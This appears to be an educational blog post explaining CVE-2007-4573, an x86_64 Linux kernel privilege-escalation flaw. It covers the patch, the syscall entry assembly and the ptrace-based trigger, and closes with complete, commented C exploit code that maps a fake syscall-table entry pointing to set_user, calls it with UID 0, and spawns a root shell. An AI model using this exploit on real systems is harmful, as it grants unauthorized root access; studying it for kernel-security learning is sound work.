CVE-2007-4573 is two years old at this point, but it remains one of my favorite
vulnerabilities. It was a local privilege-escalation vulnerability on
all x86_64 kernels prior to v2.6.22.7. It’s very simple to
understand with a little bit of background, and the exploit is
super-simple, but it’s still more interesting than Yet Another NULL
Pointer Dereference. Plus, it was the first kernel bug I wrote an
exploit for, which was fun.
In this post, I’ll write up my exploit for CVE-2007-4573, and try to give enough background for someone with some experience with C, Linux, and a bit of x86 assembly to understand what’s going on. If you’re an experienced kernel hacker, you probably won’t find much new here, but if you’re not, hopefully you’ll get a sense for some of the pieces that go into a kernel exploit.
The patch
I’ll start out with the patch, or rather a slightly simplified version, that omits some hunks that will be irrelevant for my discussion. Then I’ll explain the context for the patch, and by that point we’ll have enough context to understand the exploit code.
A simplified version of the patch follows (the original is commit
176df245 in Linus’s git repository). Note that this patch was applied
to v2.6.22, and these files have since moved around, so pull out an
older kernel if you’re trying to follow along at home:
--- a/arch/x86_64/ia32/ia32entry.S
+++ b/arch/x86_64/ia32/ia32entry.S
@@ -38,6 +38,18 @@
movq %rax,R8(%rsp)
.endm
+ .macro LOAD_ARGS32 offset
+ movl \offset(%rsp),%r11d
+ movl \offset+8(%rsp),%r10d
+ movl \offset+16(%rsp),%r9d
+ movl \offset+24(%rsp),%r8d
+ movl \offset+40(%rsp),%ecx
+ movl \offset+48(%rsp),%edx
+ movl \offset+56(%rsp),%esi
+ movl \offset+64(%rsp),%edi
+ movl \offset+72(%rsp),%eax
+ .endm
@@ -334,7 +346,7 @@ ia32_tracesys:
movq $-ENOSYS,RAX(%rsp) /* really needed? */
movq %rsp,%rdi /* &pt_regs -> arg1 */
call syscall_trace_enter
- LOAD_ARGS ARGOFFSET /* reload args from stack in case ptrace changed it */
+ LOAD_ARGS32 ARGOFFSET /* reload args from stack in case ptrace changed it */
RESTORE_REST
jmp ia32_do_syscall
END(ia32_syscall)
The patch defines the LOAD_ARGS32 macro, and replaces LOAD_ARGS
with it in several places (I’ve only shown one for
simplicity). LOAD_ARGS32 differs only slightly from the LOAD_ARGS
macro that it is replacing, which is defined in
include/asm-x86_64/calling.h:
.macro LOAD_ARGS offset
movq \offset(%rsp),%r11
movq \offset+8(%rsp),%r10
movq \offset+16(%rsp),%r9
movq \offset+24(%rsp),%r8
movq \offset+40(%rsp),%rcx
movq \offset+48(%rsp),%rdx
movq \offset+56(%rsp),%rsi
movq \offset+64(%rsp),%rdi
movq \offset+72(%rsp),%rax
.endm
As the name suggests, LOAD_ARGS32 loads the registers from the stack
as 32-bit values, rather than 64-bit. Importantly, in doing so it
takes advantage of a quirk of the x86_64 architecture: writing to the
32-bit version of a register zeroes the top 32 bits of the full
64-bit register. LOAD_ARGS32 thus zero-extends the 32-bit values it
loads into the 64-bit registers.
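To make the difference concrete, here is a minimal C sketch that models the two load styles on a single saved register slot. The function names are made up for illustration and are not kernel code; the casts merely mimic what movq and movl do to a 64-bit register on a little-endian x86_64 machine.

```c
#include <stdint.h>

/* Hypothetical model of `movq off(%rsp),%reg`:
 * all 64 bits of the saved slot end up in the register. */
uint64_t load_arg64(uint64_t saved_slot) {
    return saved_slot;
}

/* Hypothetical model of `movl off(%rsp),%reg32`:
 * only the low 32 bits are read, and the write to the 32-bit
 * register clears the upper half of the 64-bit register. */
uint64_t load_arg32(uint64_t saved_slot) {
    return (uint64_t)(uint32_t)saved_slot;
}
```

With a saved slot of 0x100000005, load_arg64 hands back the full value, while load_arg32 hands back just 5: any high bits that a tracer planted on the stack are discarded.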
System call handling
So, why is this patch so important? Let’s look at the context for the
LOAD_ARGS → LOAD_ARGS32 change. ia32entry.S contains the
definitions of the entry points for 32-bit compatibility-mode system
calls on an x86_64 processor. In other words, these are the entry
points used by 32-bit processes running on a 64-bit machine, or by
64-bit processes that use old-style int $0x80 system calls for
whatever reason.
There are three entry points in the file: one for 32-bit SYSCALL
instructions, one for 32-bit SYSENTER, and one for int $0x80. They
are all very similar, and we will only consider the int $0x80 case
here. At boot time, Linux configures the processor so that int $0x80
will dispatch to the ia32_syscall entry point. Ignoring a bunch of
debugging information, tracing, and other junk, this entry point’s
code is fairly simple:
ENTRY(ia32_syscall)
movl %eax,%eax
pushq %rax
SAVE_ARGS 0,0,1
GET_THREAD_INFO(%r10)
orl $TS_COMPAT,TI_status(%r10)
testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
jnz ia32_tracesys
ia32_do_call:
cmpl $(IA32_NR_syscalls-1),%eax
ja ia32_badsys
IA32_ARG_FIXUP
call *ia32_sys_call_table(,%rax,8)
movq %rax,RAX-ARGOFFSET(%rsp)
jmp int_ret_from_sys_call
%eax, according to Linux’s syscall convention, stores the syscall number. The movl zero-extends it into %rax, and then we save it and the syscall arguments onto the stack.
The next block retrieves the struct thread_info for the current task, sets the TS_COMPAT status bit to indicate that we’re handling a 32-bit compatibility-mode syscall, and then checks the thread’s flags to determine whether this thread has been flagged for extra processing on syscall entry. If so, we jump away to code to handle that work.
Next (at the cmpl), we check to make sure that the requested syscall is in-bounds, and branch to an error path if not.
IA32_ARG_FIXUP is a simple macro that moves registers around to translate between the Linux syscall calling convention and the x86_64 calling convention, which each hold arguments in different registers. Once we’ve fixed up the registers, the call instruction indexes the system call table by the system call number, looks up the address stored there, and calls into it to dispatch the syscall.
Finally, we save the return code from the system call into the register area on the stack, and jump to code to handle the return to userspace.
One thing we should notice about this code is that when we
check that the syscall is in bounds, we compare against the 32-bit
%eax register, but when we actually dispatch the syscall, we use
the full 64 bits in %rax. The movl at the top of the function serves
to zero-extend %eax, so that normally, the top 32 bits of %rax
are zero, and this distinction doesn’t matter.
The problem arises in the “traced” path in ia32_tracesys, which is
(again, with some extra code removed):
ia32_tracesys:
movq %rsp,%rdi /* &pt_regs -> arg1 */
call syscall_trace_enter
LOAD_ARGS ARGOFFSET /* reload args from stack in case ptrace changed it */
jmp ia32_do_call
Essentially, ia32_tracesys just calls into the C function
syscall_trace_enter, with a pointer to the registers saved on the stack,
and then restores the register values from the stack and jumps back to
execute the system call.
Herein lies the problem. If syscall_trace_enter replaces the on-stack
%rax with a 64-bit value, and LOAD_ARGS restores it, then the
%eax/%rax distinction above becomes a problem. As long as %eax is no
greater than (IA32_NR_syscalls-1), the bounds check passes, yet %rax
can be much larger than the size of the syscall table, causing the
call to index off the end of it.
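The mismatch can be modeled in a few lines of C. This is only a sketch of the logic, not kernel code: the function names are invented, and the table size of 320 entries is a placeholder standing in for IA32_NR_syscalls, whose real value depends on the kernel.

```c
#include <stdint.h>
#include <stdbool.h>

/* Placeholder for IA32_NR_syscalls; the real value is kernel-specific. */
#define HYPOTHETICAL_NR_SYSCALLS 320u

/* Models `cmpl $(IA32_NR_syscalls-1),%eax; ja ia32_badsys`:
 * only the low 32 bits of the register take part in the comparison. */
bool passes_bounds_check(uint64_t rax) {
    uint32_t eax = (uint32_t)rax;
    return eax <= HYPOTHETICAL_NR_SYSCALLS - 1;
}

/* Models the address arithmetic of `call *ia32_sys_call_table(,%rax,8)`:
 * the byte offset into the table is computed from all 64 bits. */
uint64_t dispatch_byte_offset(uint64_t rax) {
    return rax * 8;
}
```

A value such as 1 << 32 has zero in its low 32 bits, so passes_bounds_check accepts it as if it were syscall 0, while dispatch_byte_offset yields an offset of 32 GB past the start of the table.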
ptrace(2)
So what happens inside syscall_trace_enter, and how can we take
advantage of that to load a 64-bit value into the restored %rax?
Well, that turns out to be the code that handles processes traced by
the ptrace(2) process-tracing mechanism, which, among other things,
allows the tracer to stop a child process before each system call, and
inspect and modify the child’s registers before the system call proceeds.
Reading ptrace(2), we find that we can use ptrace(PTRACE_SYSCALL,…)
to cause a process to execute until its next system call, and then,
once it’s stopped, we can use ptrace(PTRACE_POKEUSER,…) to modify
the tracee’s registers.
Putting it all together
So, to exploit this bug, we need to:
- Have a 64-bit process attach to some process with ptrace.
- Use PTRACE_SYSCALL to stop that process at its next syscall.
- Have the process execute an int $0x80.
- Have the parent modify %rax in the child to be 64 bits wide, and allow the child to continue.
At this point, the child will index waaay off the end of the syscall
table – so far off, in fact, that the address computation will wrap
around past the top of the 64-bit address space (on x86_64, the entire
kernel is mapped into the last 2 GB of the address space) and come out
at a low address. Since the kernel and user programs run in the same
address space, this means that, with an appropriate choice of %rax,
the kernel will dereference an address in the user address space to
find the address of the function it should jump to in order to handle
the system call.
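The wraparound is easy to check by hand. The sketch below uses the example ia32_sys_call_table address that appears in the exploit's syscall_table define (0xffffffff8044b8a0, which is specific to one kernel build) together with an %rax of 1 << 32; the helper names are invented for illustration.

```c
#include <stdint.h>

/* Address the `call *table(,%rax,8)` instruction reads from.
 * Unsigned 64-bit arithmetic wraps modulo 2^64, like the CPU's
 * effective-address computation. */
uint64_t landing_address(uint64_t table, uint64_t rax) {
    return table + 8 * rax;
}

/* Base of the 4 KB page containing addr, i.e. what must be mapped. */
uint64_t page_base(uint64_t addr) {
    return addr & ~(uint64_t)0xFFF;
}
```

Here 8 * (1 << 32) is 0x800000000, and adding it to 0xffffffff8044b8a0 overflows 64 bits, leaving 0x78044b8a0. That is an ordinary user-space address, so an unprivileged process can map the page at 0x78044b000 and control what the kernel reads from it.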
My entire exploit code follows. It is far from fully weaponized (for one thing, it needs tweaking for the specific target kernel), but it works. (Well, it works if you can still find an unpatched kernel anywhere these days.) Nowadays, if I were writing an exploit like this, I’d plug it into something like Brad Spengler’s Enlightenment, which takes care of most of the annoying bits of executing shellcode in-kernel: changing the current user, disabling any security modules that might be problematic, and working across kernel versions as necessary.
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
#include <stddef.h>
#include <signal.h>
/**
* Replace these with the values of `ia32_sys_call_table' and
* `set_user' from /proc/kallsyms or /boot/System.map-$(uname -r)
*/
#define syscall_table 0xffffffff8044b8a0
#define set_user 0xffffffff8028d785
/*
We don't _need_ these -- with only a little bit of cleverness, we can
get around not knowing them, but having them will make the code
simpler.
set_user is defined in kernel/sys.c, and can be used to change the
UID of the current process. We'll trick the kernel into calling it on
our behalf, and thus avoid having to write any code to run in
kernel-mode ourselves.
*/
#define offset (1L << 32)
#define landing (syscall_table + 8*offset)
/*
'offset' is the 64-bit value we will load into %rax using ptrace().
This will cause the "call" instruction we saw above to look up the
value stored at that index off the syscall table, which is the
address we compute in "landing".
*/
int main(void) {
    if(mmap((void*)(landing&~0xFFF), 4096,
            PROT_READ|PROT_EXEC|PROT_WRITE,
            MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
            -1, 0) == MAP_FAILED) {
        perror("mmap");
        exit(-1);
    }
    *(long*)landing = set_user;
    /*
      We use mmap(2) to map a page at "landing", and write a
      pointer to the set_user function there.
    */
    pid_t child;
    child = fork();
    /*
      We fork into two processes. The parent will ptrace the child,
      and the child will execute the `int 0x80` syscall.
    */
    if(child == 0) {
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        kill(getpid(), SIGSTOP);
        /*
          We ask for someone to trace us, and then signal
          ourselves, which causes us to wait for our parent to
          attach via `ptrace`.
        */
        __asm__("movl $0, %ebx\n\t"
                "int $0x80\n");
        /*
          We then make an (arbitrary) syscall via int 0x80,
          with %ebx set to 0. Linux's system call convention
          stores the first argument in %ebx, so if all goes
          right, when our parent mucks with %rax, this will
          result in the kernel calling set_user(0), setting
          our current UID to 0.
        */
        execl("/bin/sh", "/bin/sh", NULL);
        /* Once we have root, we exec a shell. */
    } else {
        wait(NULL);
        ptrace(PTRACE_SYSCALL, child, NULL, NULL);
        wait(NULL);
        ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
               (void*)offset);
        ptrace(PTRACE_DETACH, child, NULL, NULL);
        wait(NULL);
        /*
          All the parent needs to do is `wait` for the child
          to stop, allow it to advance until the next syscall,
          use `PTRACE_POKEUSER` to poke `offset` into `%rax`,
          and then detach and let it run.
        */
    }
}